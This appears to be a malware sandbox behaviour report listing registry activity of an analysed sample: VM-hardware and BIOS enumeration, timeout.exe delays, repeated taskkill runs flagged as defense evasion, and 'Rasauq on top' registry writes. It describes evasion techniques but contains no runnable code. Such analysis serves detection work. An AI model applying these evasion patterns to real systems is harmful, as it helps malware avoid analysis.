Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\powercfg.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software C:\Windows\system32\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{7D3EAAF0-B03A-496A-B111-C6B2461A6BAA} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e9070300420061007200510065007600690072000a0041006200670020006600760074006100720071002000760061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000006e7590a74094db0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000